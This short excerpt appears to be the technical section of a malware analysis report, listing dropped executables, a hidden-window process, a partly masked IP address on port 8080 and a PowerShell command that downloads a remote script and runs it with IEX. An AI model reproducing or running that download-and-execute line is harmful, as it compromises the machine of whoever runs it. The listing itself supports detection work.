Technical Information
- '%TEMP%\catchme\catchme_v10.exe'
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1492
- %TEMP%\catchme\catchme_v10.exe
- %TEMP%\1305057.cvr
- '11#.#70.171.229':8080
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' $C=New-Object System.Net.WebClient;IEX $C.downloadstring('http://11#.#70.171.229:8080/qYrNHa')
- '%TEMP%\catchme\catchme_v10.exe' ' (with hidden window)